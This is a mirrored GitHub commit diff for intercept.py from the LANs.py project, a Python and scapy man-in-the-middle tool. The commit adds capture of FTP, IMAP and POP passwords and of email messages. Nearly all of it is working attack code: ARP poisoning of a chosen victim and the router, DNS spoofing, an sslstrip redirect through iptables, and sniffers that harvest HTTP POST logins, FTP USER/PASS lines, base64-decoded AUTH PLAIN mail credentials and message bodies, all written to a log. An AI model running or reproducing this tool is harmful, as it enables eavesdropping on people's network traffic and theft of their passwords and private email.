github/LANs.py
1
0
Fork 0
mirror of https://github.com/DanMcInerney/LANs.py.git synced 2025-07-15 01:23:49 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

Now catches FTP, IMAP, and POP passwords as well as incoming and outgoing email messages

Browse source
This commit is contained in:
DanMcInerney 2013-09-25 10:26:58 -06:00
parent 87849a4882
commit c0da8dc5e0
1 changed files with 427 additions and 253 deletions
Download patch file Download diff file Expand all files Collapse all files

680
intercept.py
View file

@ -6,48 +6,28 @@ from scapy.all import *
conf.verb=0 conf.verb=0
#Below is necessary to receive a response to the DHCP packets because we're sending to 255.255.255.255 but receiving from the IP of the DHCP server #Below is necessary to receive a response to the DHCP packets because we're sending to 255.255.255.255 but receiving from the IP of the DHCP server
conf.checkIPaddr=0 conf.checkIPaddr=0
import time
import sys import sys
import threading from threading import Thread
import argparse import argparse
import sys import sys
import os import os
import signal import signal
import base64
from subprocess import * from subprocess import *
#Check if root
if not os.geteuid()==0:
sys.exit("\nPlease run as root\n")
#Create the arguments #Create the arguments
parser = argparse.ArgumentParser() parser = argparse.ArgumentParser()
parser.add_argument("-u", "--urlspy", help="Show all URLs the victim is browsing minus URLs that end in .jpg, .png, .gif, .css, and .js to make the output much friendlier. Also truncates URLs at 150 characters. Use -uv to print all URLs and without truncation.", action="store_true") parser.add_argument("-u", "--urlspy", help="Show all URLs the victim is browsing minus URLs that end in .jpg, .png, .gif, .css, and .js to make the output much friendlier. Also truncates URLs at 150 characters. Use -uv to print all URLs and without truncation.", action="store_true")
parser.add_argument("-d", "--dnsspy", help="Show all DNS resquests the victim makes. This has the advantage of showing HTTPS domains which the -u option will not but does not show the full URL the victim is requesting.", action="store_true")
parser.add_argument("-ip", "--ipaddress", help="Enter IP address of victim and skip the arp ping at the beginning.") parser.add_argument("-ip", "--ipaddress", help="Enter IP address of victim and skip the arp ping at the beginning.")
parser.add_argument("-dn", "--driftnet", help="Open an xterm window with driftnet.", action="store_true") parser.add_argument("-d", "--driftnet", help="Open an xterm window with driftnet.", action="store_true")
parser.add_argument("-ssl", "--sslstrip", help="Open an xterm window with sslstrip and output to sslstrip.txt", action="store_true") parser.add_argument("-s", "--sslstrip", help="Open an xterm window with sslstrip and output to sslstrip.txt", action="store_true")
parser.add_argument("-uv", "--verboseURL", help="Shows all URLs the victim visits", action="store_true") parser.add_argument("-v", "--verboseURL", help="Shows all URLs the victim visits", action="store_true")
parser.add_argument("-dns", "--dnsspoof", help="Spoof DNS responses of a specific domain. Enter domain after this argument") parser.add_argument("-dns", "--dnsspoof", help="Spoof DNS responses of a specific domain. Enter domain after this argument")
parser.add_argument("-p", "--post", help="Print the URL the victim POSTs to, show usernames and passwords in unsecure HTTP POSTs", action="store_true") parser.add_argument("-p", "--post", help="Print the URL the victim POSTs to, show usernames/passwords in unsecure HTTP POSTs, show FTP usernames/passwords", action="store_true")
parser.add_argument("-s", "--search", help="Print victim's search queries", action="store_true") parser.add_argument("-w", "--write", help="Write to logfile", action="store_true")
parser.add_argument("-i", "--interface", help="Choose the interface to use. Default is the first one that shows up in `ip route`") parser.add_argument("-i", "--interface", help="Choose the interface to use. Default is the first one that shows up in `ip route`")
args = parser.parse_args() args = parser.parse_args()
# /dev/null, send output from programs so they don't print to screen.
DN = open(os.devnull, 'w')
#Find the gateway and use it as the router's info
ipr = Popen(['ip', 'route'], stdout=PIPE, stderr=DN)
ipr = ipr.communicate()[0]
routerRE = re.search('default via ((\d{2,3}\.\d{1,3}\.\d{1,4}\.)\d{1,3}) \w+ (\w[a-zA-Z0-9]\w[a-zA-Z0-9][0-9]?)', ipr)
routerIP = routerRE.group(1)
IPprefix = routerRE.group(2)
if args.interface:
interface = args.interface
else:
interface = routerRE.group(3)
localIP = [x[4] for x in scapy.all.conf.route.routes if x[2] != '0.0.0.0'][0]
localMAC = get_if_hwaddr(interface)
#Console colors #Console colors
W = '\033[0m' # white (normal) W = '\033[0m' # white (normal)
R = '\033[31m' # red R = '\033[31m' # red
@ -59,188 +39,302 @@ C = '\033[36m' # cyan
GR = '\033[37m' # gray GR = '\033[37m' # gray
T = '\033[93m' # tan T = '\033[93m' # tan
print "Checking the DHCP and DNS server addresses...\n" # /dev/null, send output from programs so they don't print to screen.
dhcp = (Ether(dst='ff:ff:ff:ff:ff:ff')/ oldack = None
IP(src="0.0.0.0",dst="255.255.255.255")/ oldload = None
UDP(sport=68,dport=67)/ oldurl = None
BOOTP(chaddr='E3:2E:F4:DD:8R:9A')/ oldhttp = None
DHCP(options=[("message-type","discover"), if args.write:
("param_req_list", logger = open('interceptlog.txt', 'w+')
chr(DHCPRevOptions["router"][0]),
chr(DHCPRevOptions["domain"][0]),
chr(DHCPRevOptions["server_id"][0]),
chr(DHCPRevOptions["name_server"][0]),
), "end"]))
ans, unans = srp(dhcp, timeout=6, retry=1) class Spoof():
if ans: def originalMAC(self, ip):
for s,r in ans: # srp is for layer 2 packets with Ether layer, sr is for layer 3 packets like ARP and IP
DHCPopt = r[0][DHCP].options ans,unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip), timeout=5, retry=3)
DHCPsrvr = r[0][IP].src for s,r in ans:
for x in DHCPopt: return r.sprintf("%Ether.src%")
if 'domain' in x: def poison(self, routerIP, victimIP, routerMAC, victimMAC):
local_domain = x[1] send(ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst=victimMAC))
pass send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst=routerMAC))
else: def restore(self, routerIP, victimIP, routerMAC, victimMAC):
local_domain = 'None' send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=victimMAC), count=3)
if 'name_server' in x: send(ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=routerMAC), count=3)
DNSsrvr = x[1]
else:
print "No answer to DHCP packet sent to find the DNS server. Setting DNS and DHCP server to router IP.\n"
DNSsrvr = routerIP
DHCPsrvr = routerIP
local_domain = 'None'
if args.ipaddress: class Parser():
victimIP = args.ipaddress
else:
ans,unans = arping(IPprefix+'*')
for s,r in ans:
ips = r.sprintf("%ARP.hwsrc% %ARP.psrc%")
print ips
victimIP = raw_input('\nType victim\'s IP: ')
print ''
def originalMAC(ip): headersFound = []
# srp is for layer 2 packets with Ether layer, sr is for layer 3 packets like ARP and IP IMAPauth = 0
ans,unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip), timeout=5, retry=3) IMAPdest = ''
for s,r in ans: POPauth = 0
return r.sprintf("%Ether.src%") POPdest = ''
def poison(routerIP, victimIP): def start(self, pkt):
send(ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst="ff:ff:ff:ff:ff:ff")) if pkt.haslayer(Raw) and pkt.haslayer(Ether) and pkt.haslayer(TCP):
send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst="ff:ff:ff:ff:ff:ff")) if pkt[Ether].src == victimMAC:
self.URL(pkt)
self.mailspy(pkt)
def restore(routerIP, victimIP, routerMAC, victimMAC): def URL(self, pkt):
send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=victimMAC), count=3) global oldack, oldload, oldurl, oldhttp
send(ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=routerMAC), count=3)
def URL(pkt):
global host, get, post, url
if pkt.haslayer(Raw) and pkt.haslayer(Ether):
if pkt[Ether].src == victimMAC:
pkt = repr(pkt[Raw].load)
try:
headers, body = pkt.split(r"\r\n\r\n")
except:
headers = pkt
body = ''
header_lines = headers.split(r"\r\n")
for l in header_lines:
searchHost = re.search('[Hh]ost: ', l)
searchGet = re.search('GET /', l)
searchPost = re.search('POST /', l)
if searchHost:
host = l.split(' ')
host = host[1]
if searchGet:
get = l.split(' ')
get = get[1]
if searchPost:
post = l.split(' ')
post = post[1]
#If a packet with data is retrasmitted amongst multiple packets this will catch all the split up parts that are lacking in features of a normal packet
if args.post and len(pkt) < 450:
if body != '':
username = re.findall('(([Ee]mail|[Uu]ser|[Uu]sername|[Nn]ame|[Ll]ogin|[Ll]og)=([^&][^&]*))', body)
password = re.findall('(([Pp]assword|[Pp]ass|[Pp]asswd|[Pp]wd|[Pp]assw)=([^&][^&]*))', body)
if username != [] or password != []:
print T+'[+] Packet may\'ve been split. Load data:',body+W
for x in username:
for u in x:
if '=' in u:
print R+u+W
for y in password:
for p in y:
if '=' in p:
print R+p+W
if not get:
username = re.findall('(([Ee]mail|[Uu]ser|[Uu]sername|[Nn]ame|[Ll]ogin|[Ll]og)=([^&][^&]*))', headers)
password = re.findall('(([Pp]assword|[Pp]ass|[Pp]asswd|[Pp]wd|[Pp]assw)=([^&][^&]*))', headers)
if username != [] or password != []:
print T+'[+] Packet may\'ve been split. Load data:',headers+W
for x in username:
for u in x:
if '=' in u:
print R+u+W
for y in password:
for p in y:
if '=' in p:
print R+p+W
if host and get:
url = host+get
if host and post:
url = host+post
if url == None:
return
if args.post and post:
if body != '':
print B+'[+] POST:',url,'HTTP POST load:',body+W
username = re.findall('(([Ee]mail|[Uu]ser|[Uu]sername|[Nn]ame|[Ll]ogin|[Ll]og)=([^&][^&]*))', body)
password = re.findall('(([Pp]assword|[Pp]ass|[Pp]asswd|[Pp]wd|[Pp]assw)=([^&][^&]*))', body)
for x in username:
for u in x:
if '=' in u:
print R+u+W
for y in password:
for p in y:
if '=' in p:
print R+p+W
if args.urlspy:
d = ['.jpg', '.jpeg', '.gif', '.png', '.css', '.ico', '.js']
if any(i in url for i in d):
return
if len(url) > 150:
print url[:149]
else:
print url
if args.verboseURL:
print url
if args.search:
searched = re.search('((search|query|search\?q|\?s|&q|\?q|search\?p|keywords)=([^&][^&]*))', url)
if searched:
searched = searched.group(3)
searched = searched.replace('+', ' ').replace('%20', ' ').replace('%3F', '?').replace('%27', '\'').replace('%40', '@').replace('%24', '$').replace('%3A', ':').replace('%3D', '=').replace('%22', '\"').replace('%24', '$')
print T + '[+] Searched %s for:' % host,searched + W
host = None host = None
get = None get = None
post = None post = None
url = None url = None
def DNSreq(pkt): #Split the packet between headers and body and grab the URL from the headers
if pkt.haslayer(DNSQR): ack = pkt[TCP].ack
dnsreq = pkt[DNSQR].qname pktload = repr(pkt[Raw].load).replace("'", "")
print dnsreq dport = pkt[TCP].dport
sport = pkt[TCP].sport
#If you see any other login variable names, tell me and I'll add em in here
user_regex = '(([Ee]mail|[Uu]ser|[Uu]sername|[Nn]ame|[Ll]ogin|[Ll]og|[Ll]ogin[Ii][Dd])=([^&][^&]*))'
pw_regex = '(([Pp]assword|[Pp]ass|[Pp]asswd|[Pp]wd|[Pp]assw)=([^&][^&]*))'
try:
headers, body = pktload.split(r"\r\n\r\n")
except:
headers = pktload
body = ''
header_lines = headers.split(r"\r\n")
for l in header_lines:
searchHost = re.search('[Hh]ost: ', l)
searchGet = re.search('GET /', l)
searchPost = re.search('POST /', l)
if searchHost:
host = l.split(' ')
host = host[1]
if searchGet:
get = l.split(' ')
get = get[1]
if searchPost:
post = l.split(' ')
post = post[1]
if host and get:
url = host+get
if host and post:
url = host+post
def mkspoof(DNSpkt): #Catch fragmented packet passwords, and FTP passwords
ip=DNSpkt[IP] if args.post:
dnsLayer=DNSpkt[DNS] #Catch fragmented packet passwords
# qr = query or response (0,1), aa=are the nameservers authoritative? (0,1), ad=authenticated data (0,1) if oldack == ack and oldload and oldhttp == 'post':
p = IP(dst=ip.src, src=ip.dst)/UDP(dport=ip.sport, sport=ip.dport)/DNS(id=dnsLayer.id, qr=1, aa=1, qd=dnsLayer.qd, an=DNSRR(rrname=dnsLayer.qd.qname, ttl=10, rdata=localIP)) combined_load = oldload + pktload
return p print B+'[+] fragmented POST:',oldurl,'HTTP POST load:',body+W
username = re.findall(user_regex, combined_load)
password = re.findall(pw_regex, combined_load)
self.user_pass(username, password)
#Catch FTP passwords
if dport == 21:
load = pktload.replace(r"\r\n", "")
if 'USER ' in load:
print R+'FTP '+load+W
if args.write:
logger.write('FTP'+load+'\n')
if 'PASS ' in load:
print R+'FTP '+load+W
if args.write:
logger.write('FTP'+load+'\n')
class urlspy(threading.Thread): #Catch search terms, print url, print post loads
def run(self): if url != None:
#Print the URL
if args.urlspy:
d = ['.jpg', '.jpeg', '.gif', '.png', '.css', '.ico', '.js']
if any(i in url for i in d):
return
if len(url) > 150:
print url[:149]
else:
print url
if args.verboseURL:
print url
#Catch search terms
searched = re.search('((search|query|search\?q|\?s|&q|\?q|search\?p|keywords|command)=([^&][^&]*))', url)
if searched:
searched = searched.group(3)
if 'select%20*%20from' in searched:
pass
else:
searched = searched.replace('+', ' ').replace('%20', ' ').replace('%3F', '?').replace('%27', '\'').replace('%40', '@').replace('%24', '$').replace('%3A', ':').replace('%3D', '=').replace('%22', '\"').replace('%24', '$')
print T+'[+] Searched %s for:' % host,searched+W
if args.write:
logger.write('[+] Searched %s for: ' % host+searched+'\n')
#Print POST load
if post:
if 'ocsp.' in url:
print B+'[+] POST:',url+W
else:
print B+'[+] POST:',url,'HTTP POST load:',body+W
if body != '':
username = re.findall(user_regex, body)
password = re.findall(pw_regex, body)
self.user_pass(username, password)
oldhttp = 'post'
oldload = pktload
oldack = ack
oldurl = url
if not post:
oldhttp = None
host = None
get = None
post = None
url = None
def user_pass(self, username, password):
if username:
for x in username:
for u in x:
if '=' in u:
print R+u+W
if args.write:
logger.write(u+'\n')
if password:
for y in password:
for p in y:
if '=' in p:
print R+p+W
if args.write:
logger.write(p+'\n')
def mailspy(self, pkt):
dport = pkt[TCP].dport
sport = pkt[TCP].sport
MAC_dst = pkt[Ether].dst
MAC_src = pkt[Ether].src
mail_ports = [143, 110, 26]
if dport in mail_ports or sport in mail_ports:
load = repr(pkt[Raw].load).replace("'", "")
try:
headers, body = load.split(r"\r\n\r\n", 1)
except:
headers = load
body = ''
header_lines = headers.split(r"\r\n")
email_headers = ['Date: ', 'Subject: ', 'To: ', 'From: ']
# Find passwords
if dport in [110, 143, 26]:
IP_dst = pkt[IP].dst
self.passwords(IP_dst, load, dport)
# Find outgoing messages
if dport == 26:
self.outgoing(load, body, header_lines, email_headers, MAC_src)
# Find incoming msgs
if MAC_dst == victimMAC:
if sport in [110, 143]:
self.incoming(headers, body, header_lines, email_headers)
def passwords(self, IP_dst, load, dport):
if dport == 143:
if self.IMAPauth == 1 and IP_dst == self.IMAPdest:
print R+'[!] IMAP user and pass found: '+load+W
if args.write:
logger.write('[!] IMAP user and pass found: '+load+'\n')
self.decode(load, dport)
self.IMAPauth = 0
self.IMAPdest = ''
if "authenticate plain" in load:
self.IMAPauth = 1
self.IMAPdest = IP_dst
if dport == 110:
if self.POPauth == 1 and IP_dst == self.POPdest:
print R+'[!] POP user and pass found: '+load+W
if args.write:
logger.write('[!] POP user and pass found: '+load+'\n')
self.decode(load, dport)
self.POPauth = 0
self.POPdest = ''
if "AUTH PLAIN" in load:
self.POPauth = 1
self.POPdest = IP_dst
if dport == 26:
if 'AUTH PLAIN ' in load:
print R+'[!] POP authentication found: '+load+W
if args.write:
logger.write('[!] POP authentication found: '+load+'\n')
self.decode(load, dport)
def outgoing(self, headers, body, header_lines, email_headers, MAC_src):
if MAC_src == victimMAC:
if 'Message-ID' in headers:
for l in header_lines:
for x in email_headers:
if x in l:
self.headersFound.append(l)
if len(self.headersFound) > 3:
print O+'[!] OUTGOING MESSAGE'+W
if args.write:
logger.write('[!] OUTGOING MESSAGE\n')
for x in self.headersFound:
print O+' ',x+W
if args.write:
logger.write(' '+x+'\n')
self.headersFound = []
if body != '':
print O+' Message:',body+W
if args.write:
logger.write(' Message:'+body+'\n')
def incoming(self, headers, body, header_lines, email_headers):
if 'FETCH' not in headers:
for l in header_lines:
for x in email_headers:
if x in l:
self.headersFound.append(l)
if len(self.headersFound) > 3:
print O+'[!] INCOMING MESSAGE'+W
if args.write:
logger.write('[!] INCOMING MESSAGE\n')
for x in self.headersFound:
print O+' '+x+W
if args.write:
logger.write(' '+x+'\n')
self.headersFound = []
if body != '':
try:
beginning = body.split(r"\r\n")[0]
message = str(body.split(r"\r\n\r\n", 1)[1:]).replace('[', '', 1)
message = message.split(beginning)[0]
print O+' Message:', message+W
if args.write:
logger.write(' Message:'+message+'\n')
except:
print O+' Couldn\'t format message body:', body+W
def decode(self, load, dport):
if dport == 26:
try:
b64str = load.replace("AUTH PLAIN ", "").replace(r"\r\n", "")
b64decode = base64.b64decode(b64str)
print R+'[!] Decoded:'+b64decode+W
if args.write:
logger.write('[!] Decoded: '+b64decode+'\n')
except:
pass
else:
try:
b64str = load.replace(r"\r\n", "")
b64decode = base64.b64decode(b64str)
print R+'[!] Decoded:',b64decode+W
if args.write:
logger.write('[!] Decoded: '+b64decode+'\n')
except:
pass
class Threads():
def urlspy(self, victimIP, interface):
# This is in case you need to test the program without an actual victim # This is in case you need to test the program without an actual victim
# sniff(store=0, filter='port 80', prn=URL, iface=interface) # sniff(store=0, filter='port 80 or port 21', prn=URL, iface=interface)
sniff(store=0, filter='port 80 and host %s' % victimIP, prn=URL, iface=interface) sniff_filter = '(port 80 or port 21 or port 143 or port 110 or port 26) and host %s' % victimIP
sniff(store=0, filter=sniff_filter, prn=Parser().start, iface=interface)
class dnsspy(threading.Thread): def dnsspoof(self, victimIP):
def run(self):
sniff(store=0, filter='port 53 and host %s' % victimIP, prn=DNSreq, iface=interface)
class dnsspoof(threading.Thread):
def run(self):
while 1: while 1:
a=sniff(filter='port 53 or port 80 and host %s' % victimIP, count=1, promisc=1) a=sniff(filter='port 53 and host %s' % victimIP, count=1, promisc=1)
DNSpkt = a[0] DNSpkt = a[0]
if not DNSpkt.haslayer(DNSQR): if not DNSpkt.haslayer(DNSQR):
continue continue
@ -248,95 +342,175 @@ class dnsspoof(threading.Thread):
send(mkspoof(DNSpkt)) send(mkspoof(DNSpkt))
print G + '[+] Spoofed:', DNSpkt.qd.qname + W print G + '[+] Spoofed:', DNSpkt.qd.qname + W
class sslstrip(threading.Thread): def sslstrip(self, DN):
def run(self):
print 'Redirecting traffic to port 10000 and starting sslstrip\n' print 'Redirecting traffic to port 10000 and starting sslstrip\n'
iptables = ['iptables', '-t', 'nat', '-A', 'PREROUTING', '-p', 'tcp', '--destination-port', '80', '-j', 'REDIRECT', '--to-port', '10000'] iptables = ['iptables', '-t', 'nat', '-A', 'PREROUTING', '-p', 'tcp', '--destination-port', '80', '-j', 'REDIRECT', '--to-port', '10000']
Popen(iptables, stdout=PIPE, stderr=DN) Popen(iptables, stdout=PIPE, stderr=DN)
xterm = ['xterm', '-e', 'sslstrip', '-f', '-w', 'sslstrip.txt'] xterm = ['xterm', '-e', 'sslstrip', '-f', '-w', 'sslstrip.txt']
Popen(xterm, stdout=PIPE, stderr=DN) Popen(xterm, stdout=PIPE, stderr=DN)
class driftnet(threading.Thread): def driftnet(self, interface, DN):
def run(self):
xterm = ['xterm', '-e', 'driftnet', '-i', '%s' % interface] xterm = ['xterm', '-e', 'driftnet', '-i', '%s' % interface]
Popen(xterm, stdout=PIPE, stderr=DN) Popen(xterm, stdout=PIPE, stderr=DN)
print "[+] Active interface: " + interface def start_threads(self, victimIP, interface, DN):
print "[+] Local IP: " + localIP if args.urlspy or args.verboseURL or args.post:
print "[+] Interface MAC: " + localMAC u = Thread(target=self.urlspy, args=(victimIP, interface))
print "[+] DHCP server: " + DHCPsrvr #Make sure the thread closes with the main program on Ctrl-C
print "[+] DNS server: " + DNSsrvr u.daemon = True
print "[+] Local domain: " + local_domain u.start()
print "[+] Router IP: " + routerIP if args.driftnet:
print "[+] Client IP: " + victimIP dr = Thread(target=self.driftnet, args=(interface, DN))
try: dr.daemon = True
routerMAC = originalMAC(routerIP) dr.start()
print "[+] Router MAC: " + routerMAC if args.sslstrip:
victimMAC = originalMAC(victimIP) ssl = Thread(target=self.sslstrip, args=(DN,))
print "[+] Victim MAC: " + victimMAC ssl.daemon = True
except: ssl.start()
sys.exit("Could not get MAC addresses") if args.dnsspoof:
ipfwd = Popen(['cat', '/proc/sys/net/ipv4/ip_forward'], stdout=PIPE, stderr=DN) dns = Thread(target=self.dnsspoof, args=(victimIP,))
if not ipfwd.communicate()[0] == '1': dns.daemon = True
f = open('/proc/sys/net/ipv4/ip_forward', 'r+') dns.start()
f.write('1')
f.close() #Print all the variables
print '[+] Enabled IP forwarding' def print_vars(interface, DHCPsrvr, dnsIP, local_domain, routerIP, victimIP):
Popen(['iptables', '-F'], stdout=PIPE, stderr=DN) print "[+] Active interface: " + interface
Popen(['iptables', '-t', 'nat', '-F'], stdout=PIPE, stderr=DN) print "[+] DHCP server: " + DHCPsrvr
Popen(['iptables', '-X'], stdout=PIPE, stderr=DN) print "[+] DNS server: " + dnsIP
Popen(['iptables', '-t', 'nat', '-X'], stdout=PIPE, stderr=DN) print "[+] Local domain: " + local_domain
print '[+] Flushed the firewall\n' print "[+] Router IP: " + routerIP
print "[+] Client IP: " + victimIP
def ip_flush_forward(DN):
ipfwd = Popen(['cat', '/proc/sys/net/ipv4/ip_forward'], stdout=PIPE, stderr=DN)
if ipfwd.communicate()[0] != '1\n':
f = open('/proc/sys/net/ipv4/ip_forward', 'r+')
f.write('1\n')
f.close()
print '[+] Enabled IP forwarding'
Popen(['iptables', '-F'], stdout=PIPE, stderr=DN)
Popen(['iptables', '-t', 'nat', '-F'], stdout=PIPE, stderr=DN)
Popen(['iptables', '-X'], stdout=PIPE, stderr=DN)
Popen(['iptables', '-t', 'nat', '-X'], stdout=PIPE, stderr=DN)
print '[+] Flushed the firewall\n'
def main(): def main():
#For use in URL_cb, mailspy respectively
global victimMAC, victimIP
if args.urlspy or args.verboseURL or args.post or args.search: #Check if root
ug = urlspy() if not os.geteuid()==0:
#Make sure the thread closes with the main program on Ctrl-C sys.exit("\nPlease run as root\n")
ug.daemon = True
ug.start()
if args.dnsspy: DN = open(os.devnull, 'w')
dt = dnsspy()
dt.daemon = True
dt.start()
if args.driftnet: if args.ipaddress:
dr = driftnet() victimIP = args.ipaddress
dr.daemon = True else:
dr.start() ans,unans = arping(IPprefix+'*')
for s,r in ans:
ips = r.sprintf("%ARP.hwsrc% %ARP.psrc%")
print ips
victimIP = raw_input('\nType victim\'s IP: ')
print ''
if args.sslstrip: #Find the gateway and interface
ssl = sslstrip() ipr = Popen(['ip', 'route'], stdout=PIPE, stderr=DN)
ssl.daemon = True ipr = ipr.communicate()[0]
ssl.start() routerRE = re.search('default via ((\d{2,3}\.\d{1,3}\.\d{1,4}\.)\d{1,3}) \w+ (\w[a-zA-Z0-9]\w[a-zA-Z0-9][0-9]?)', ipr)
routerIP = routerRE.group(1)
IPprefix = routerRE.group(2)
if args.interface:
interface = args.interface
else:
interface = routerRE.group(3)
if args.dnsspoof: print "[+] Checking the DHCP and DNS server addresses..."
ds = dnsspoof() dhcp = (Ether(dst='ff:ff:ff:ff:ff:ff')/
ds.daemon = True IP(src="0.0.0.0",dst="255.255.255.255")/
ds.start() UDP(sport=68,dport=67)/
BOOTP(chaddr='E3:2E:F4:DD:8R:9A')/
DHCP(options=[("message-type","discover"),
("param_req_list",
chr(DHCPRevOptions["router"][0]),
chr(DHCPRevOptions["domain"][0]),
chr(DHCPRevOptions["server_id"][0]),
chr(DHCPRevOptions["name_server"][0]),
), "end"]))
ans, unans = srp(dhcp, timeout=6, retry=1)
if ans:
for s,r in ans:
DHCPopt = r[0][DHCP].options
DHCPsrvr = r[0][IP].src
for x in DHCPopt:
if 'domain' in x:
local_domain = x[1]
pass
else:
local_domain = 'None'
if 'name_server' in x:
dnsIP = x[1]
else:
print "[!] No answer to DHCP packet sent to find the DNS server. Setting DNS and DHCP server to router IP."
dnsIP = routerIP
DHCPsrvr = routerIP
local_domain = 'None'
print_vars(interface, DHCPsrvr, dnsIP, local_domain, routerIP, victimIP)
try:
routerMAC = Spoof().originalMAC(routerIP)
print "[+] Router MAC: " + routerMAC
except:
sys.exit("[!] Could not get router MAC address")
try:
victimMAC = Spoof().originalMAC(victimIP)
print "[+] Victim MAC: " + victimMAC
except:
sys.exit("[!] Could not get victim MAC address")
if not dnsIP == routerIP:
try:
dnsMAC = Spoof().originalMAC(dnsIP)
print "[+] DNS server MAC: " + dnsMAC
except:
print "[!] Could not get DNS server MAC address"
sys.exit("[!] Could not get victim MAC address")
ip_flush_forward(DN)
Threads().start_threads(victimIP, interface, DN)
def signal_handler(signal, frame): def signal_handler(signal, frame):
print 'learing iptables, sending healing packets, and turning off IP forwarding...' print 'learing iptables, sending healing packets, and turning off IP forwarding...'
restore(routerIP, victimIP, routerMAC, victimMAC) if args.write:
restore(routerIP, victimIP, routerMAC, victimMAC) logger.close()
f = open('/proc/sys/net/ipv4/ip_forward', 'r+') if args.dnsspoof:
f.write('0') q.unbind(socket.AF_INET)
f.close() q.close()
if not dnsIP == routerIP:
Spoof().restore(routerIP, dnsIP, routerMAC, dnsMAC)
Spoof().restore(routerIP, dnsIP, routerMAC, dnsMAC)
Popen(['iptables', '-F'], stdout=PIPE, stderr=DN) Popen(['iptables', '-F'], stdout=PIPE, stderr=DN)
Popen(['iptables', '-t', 'nat', '-F'], stdout=PIPE, stderr=DN) Popen(['iptables', '-t', 'nat', '-F'], stdout=PIPE, stderr=DN)
Popen(['iptables', '-X'], stdout=PIPE, stderr=DN) Popen(['iptables', '-X'], stdout=PIPE, stderr=DN)
Popen(['iptables', '-t', 'nat', '-X'], stdout=PIPE, stderr=DN) Popen(['iptables', '-t', 'nat', '-X'], stdout=PIPE, stderr=DN)
Spoof().restore(routerIP, victimIP, routerMAC, victimMAC)
Spoof().restore(routerIP, victimIP, routerMAC, victimMAC)
sys.exit(0) sys.exit(0)
signal.signal(signal.SIGINT, signal_handler) signal.signal(signal.SIGINT, signal_handler)
while 1: while 1:
poison(routerIP, victimIP) Spoof().poison(routerIP, victimIP, routerMAC, victimMAC)
if not DNSsrvr == routerIP: if not dnsIP == routerIP:
poison(DNSsrvr, victimIP) Spoof().poison(dnsIP, victimIP, dnsMAC, victimMAC)
time.sleep(1.5) time.sleep(1.5)
if __name__ == "__main__": if __name__ == "__main__":
main() main()
#To do:
#use iptables to block dns responses from the router to prevent race condition in dns spoofing